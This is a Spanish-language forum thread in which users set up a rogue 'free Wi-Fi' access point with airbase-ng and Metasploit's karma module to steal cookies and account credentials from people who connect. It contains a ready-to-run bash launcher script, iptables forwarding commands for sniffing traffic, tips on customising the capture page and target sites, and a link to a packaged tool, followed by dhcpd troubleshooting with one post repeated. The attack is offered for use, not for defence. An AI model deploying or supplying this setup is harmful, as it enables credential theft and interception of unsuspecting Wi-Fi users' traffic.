Mensajes

es indiferente que tengas un router o no.

Con un Pc y una wifi montas un AP falso desde donde el karma hace su trabajo

Si además tienes uans segunda tarjeta ethernet (o wifi) conectada a un router, pues podrás navegar y hacer tus cosas mientras en el otro dispositivo está karma ... además, montando un servidor DNS y con un par de reglas en las Iptables, podrías dar salida a Internet a los que entren a través de tu AP falso y, esnifar todos los datos ...

gracias averno ... cualquier fallo o sugerencia me lo decís y la implemento

PD: intentaré pasarme más

Bueno pues ya está listo (eso espero xDD)

Podeis descargarlo en:

Código [Seleccionar] Expandir

http://pepelux.org/download.php?f=programs/Squipy.zip

Y el manual:

Código [Seleccionar] Expandir

http://pepelux.org/download.php?f=programs/squipy.pdf

Espero que os guste. Cualquier coas me lo decís y lo modifico.

Un saludo

Pero no pillo una cosa, la conexión verdadera es la de tu wifi. Lo que haces es ponerte de sniffer creando un AP falso no?

En principio con una unica wifi (sin mas conexiones que te den acceso a Internet) te sobra ya que lo único que hace es robar cookies y cuentas sin dar acceso a Internet al usuario.

No obstante, sí que podrías darle acceso a través de otra tarjeta usando las iptables ... algo así:

Código [Seleccionar] Expandir


sysctl net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE


donde eth0 es la tarjeta que te da acceso a Internet (también podría ser otra wifi en lugar de una ethernet)

Sería necesario además del dhcpd3, instalar bind o cualquier otro servidor DNS para poder resolver nombres de dominio

saludos

claro si lo único que hago es reunir todos los comandos que pusisteis en un único fichero

No se si lo sabeis pero  es posible modificar la página que sale por defecto (una negra que pone loading ...) cambiando /opt/metasploit3/msf3/data/exploits/capture/http/index.html y personalizarla a nuestro gusto

Además también se pueden personalizar las urls de donde se intenta extraer la cookie con el fichero /opt/metasploit3/msf3/data/exploits/capture/http/sites.txt

Un pequeño script que arrancaría todo de golpe podría ser:

Código [Seleccionar] Expandir


#!/bin/bash
killall -9 dhcpd3 airbase-ng
airmon-ng start ath0
airbase-ng -P -C 30 -e "WIFI-GRATIS" -v ath1 >/dev/null 2>&1 &
sleep 2
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
rm /var/lib/dhcp3/dhcpd.leases 2>/dev/null
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
msfconsole -r karma.rc


saludos

Pues debía ser cosa de mi linux (o de mi wifi) porque probé en otro PC y va bien

gracias

Pues a mi no me crea nada ... se supone que 00:21:00:95:26:b3 es la mac de at0 ?

Hola de nuevo ...

Me he fijado que cuando arranco el dhcpd me dice esto:

Código [Seleccionar] Expandir


Wrote 0 leases to leases file.


Cuando veo que debe salir esto:

Código [Seleccionar] Expandir


root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.


Qué os crea en /var/lib/dhcp3/dhcpd.leasses ???

Hola de nuevo ...

Me he fijado que cuando arranco el dhcpd me dice esto:

Código [Seleccionar] Expandir


Wrote 1 leases to leases file.


Cuando veo que debe salir esto:

Código [Seleccionar] Expandir


root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.


Qué os crea en /var/lib/dhcp3/dhcpd.leasses ???